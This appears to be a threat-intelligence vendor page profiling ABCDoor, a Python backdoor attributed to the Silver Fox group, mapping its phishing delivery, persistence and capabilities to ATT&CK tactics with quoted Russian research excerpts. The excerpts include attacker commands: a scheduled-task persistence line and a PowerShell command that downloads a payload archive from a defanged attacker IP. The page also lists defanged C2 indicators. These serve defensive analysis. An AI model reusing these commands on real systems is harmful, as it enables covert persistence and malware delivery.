ABCDoor
ABCDoor is a previously undocumented Python-based backdoor, compiled in part with Cython 3.0.7, that researchers attributed to the Silver Fox threat group. It has been in Silver Fox’s arsenal since at least late 2024, with reporting indicating activity from at least December 19, 2024, and operational use in real-world attacks from the first quarter of 2025 onward. It was named ABCDoor because its command-and-control infrastructure repeatedly used third-level domains beginning with "abc.".
ABCDoor was observed in phishing-led intrusion chains targeting organizations in India and Russia, including industrial, consulting, trade/retail, and transportation sectors. In campaigns observed in December 2025 and January 2026, Silver Fox used tax-themed phishing emails impersonating Indian and Russian tax authorities. The emails delivered PDFs containing links to ZIP/RAR archives, or archives directly, which contained a modified RustSL-based loader. That loader downloaded ValleyRAT, and custom ValleyRAT plugins such as 保86.dll and 保86.dll_bin then installed ABCDoor.
The ABCDoor installation chain downloaded a large archive from 154.82.81[.]205 and saved it as %LOCALAPPDATA%\appclient\111.zip. The archive contained a bundled Python runtime and ffmpeg.exe. Installer scripts copied files into C:\ProgramData\Tailscale and launched the malware via pythonw.exe -m appclient to masquerade as legitimate software. ABCDoor’s main module was identified as appclient.core, a Cython-compiled .pyd module.
ABCDoor establishes persistence via HKCU:\Software\Microsoft\Windows\CurrentVersion\Run\AppClient and a scheduled task named AppClient configured to run every minute. It communicates with its C2 over HTTPS using Socket.IO. Reported capabilities include system information collection, screen capture and screen streaming, remote mouse and keyboard control, file operations, process management, clipboard theft, self-update, and self-removal. ffmpeg.exe is used for screen capture/broadcasting.
Associated infrastructure and related indicators mentioned in the reporting include phishing links hosted under abc.haijing88[.]com, ValleyRAT-related C2 207.56.138[.]28:6666, and ABCDoor delivery archives retrieved from 154.82.81[.]205. The malware was delivered through a custom ValleyRAT plugin in campaigns attributed by researchers to Silver Fox.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Groups observed using it
1 distinct threat actor attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Мы назвали этот бэкдор ABCDoor... ранее недокументированный бэкдор, написанный на Python... Ретроспективное исследование показало, что он находился в арсенале Silver Fox как минимум с конца 2024 года и применяется в реальных атаках с первого квартала 2025 года по сей день.
Techniques & procedures
27 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
3 techniquesThe activity involved using phishing emails that mimic correspondence from the Income Tax Department of India in December 2025, followed by a similar campaign aimed at Russian entities.
Обе волны имели почти идентичную структуру: фишинговые письма оформлялись как официальные уведомления о проведении налоговых проверок или предлагали загрузить архив с «перечнем налоговых нарушений»... В декабрьской рассылке вредоносный код содержался непосредственно в приложенных к письму файлах.
В январской рассылке жертвам приходило письмо якобы от налоговой службы с вложенным PDF-файлом... В PDF-файле присутствовали две кликабельные ссылки для загрузки архива, ведущие на вредоносный ресурс.
Execution
6 techniquesВ планировщике задач. Для этого зловред выполняет следующую команду: cmd.exe /c "schtasks /create /sc minute /mo 1 /tn "AppClient" /tr "<path_to_pythonw.exe> -m appclient" /f"
С помощью PowerShell: powershell.exe -Command ... Invoke-WebRequest -Uri 'hxxp://154.82.81[.]205/YD20251001143052.zip' ...
После загрузки DLL-модуль распаковывает архив ... и запускает файл update.bat посредством следующей команды: cmd.exe /c "C:\Users\<user>\AppData\Local\appclient\update.bat"
Скопировав файлы, скрипт запускает Python-модуль appclient с помощью легитимного инструмента pythonw: start "" /B "%DES_DIR%\python\pythonw.exe" -m appclient
С ноября 2025 года для доставки ABCDoor злоумышленники стали использовать JavaScript-загрузчик... Затем он запускал файл run.deobfuscated.obf.js
Оба варианта рассылки пытаются сыграть на важности писем от налоговых органов, чтобы убедить жертву скачать документ и запустить цепочку атаки.
Persistence
3 techniquesВ планировщике задач. Для этого зловред выполняет следующую команду: cmd.exe /c "schtasks /create /sc minute /mo 1 /tn "AppClient" /tr "<path_to_pythonw.exe> -m appclient" /f"
После запуска команды cmd /c start /min python/pythonw.exe -m appclient полезная нагрузка Silver Fox закрепляется в системе путем изменения значения параметра UserInitMprLogonScript в разделе реестра HKCU\Environment.
Privilege Escalation
3 techniquesВ планировщике задач. Для этого зловред выполняет следующую команду: cmd.exe /c "schtasks /create /sc minute /mo 1 /tn "AppClient" /tr "<path_to_pythonw.exe> -m appclient" /f"
Running within a legitimate pythonw.exe process, ABCDoor is able to stay hidden for extended periods
Stealth
4 techniquesоригинальная версия RustSL по умолчанию шифрует все строки и добавляет мусорные инструкции для усложнения анализа... Запускаемый JS-скрипт сильно обфусцирован
The loader is disguised with a PDF or Excel file icon to avoid raising suspicion.
Running within a legitimate pythonw.exe process, ABCDoor is able to stay hidden for extended periods
После загрузки DLL-модуль распаковывает архив с помощью методов COM... Скопировав файлы, скрипт запускает Python-модуль appclient с помощью легитимного инструмента pythonw.exe
Defense Impairment
1 techniqueCredential Access
2 techniquesABCDoor is able to stay hidden for extended periods while quietly collecting screen data, exfiltrating clipboard contents, managing files, and emulating mouse and keyboard input on the victim’s machine.
Discovery
3 techniquesMainManager — подключение к C2 и авторизация (отправка данных о системе); SystemInfoManager — сбор данных о системе жертвы
Collection
5 techniquesABCDoor is able to stay hidden for extended periods while quietly collecting screen data, exfiltrating clipboard contents, managing files, and emulating mouse and keyboard input on the victim’s machine.
SystemInfoManager — сбор данных о системе жертвы, в том числе снимков экранов; RemoteControlManager ... запись экранов ... Для трансляции экрана используется отдельный файл ffmpeg.exe
при возникновении исключений записывает их в файл %LOCALAPPDATA%\applogs\exception_logs.zip... реализовала функцию Utility::upload_exception_logs для отправки архива с исключениями
Command and Control
3 techniquesБэкдор построен на основе Python-библиотек asyncio и Socket.IO. Он взаимодействует с C2 по протоколу HTTPS
Он скачивал и запускал известный бэкдор ValleyRAT... модуль пытался несколькими способами загрузить с жестко закодированного адреса архив размером 52,5 МБ.
including ABCDoor for data exfiltration and remote control.
Exfiltration
1 techniqueClipboardManager — отправка буфера обмена на C2 ... Utility::upload_exception_logs для отправки архива с исключениями на заданный URI
IOCs tracked for this family
98 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
5 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
ABCDoor is a newly documented Python-based backdoor compiled with Cython 3.0.7. It is delivered through a custom ValleyRAT plugin, installed with a bundled Python environment, and abuses ffmpeg.exe for screen capture and broadcasting. It persists via the Windows Run key and a scheduled task named 'AppClient,' hides under C:\ProgramData\Tailscale, and can collect screen data, exfiltrate clipboard contents, manage files, and emulate mouse and keyboard input.
A previously undocumented Python-based backdoor used for data exfiltration and remote control, delivered via a ValleyRAT plugin in phishing-led campaigns.
A previously undocumented Python-based backdoor used by Silver Fox. It communicates over HTTPS, supports persistence, updates and self-removal, collects screenshots, enables remote mouse and keyboard control, performs file system operations, manages processes, and exfiltrates clipboard data.
Previously undocumented Python backdoor delivered via ValleyRAT plugins and earlier via C++/Go/JavaScript loaders. It persists via Run key and scheduled task, communicates with C2 over HTTPS using Socket.IO, gathers system info and screenshots, supports remote mouse/keyboard interaction, file/process/clipboard operations, screen streaming via ffmpeg, and self-update/self-delete.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.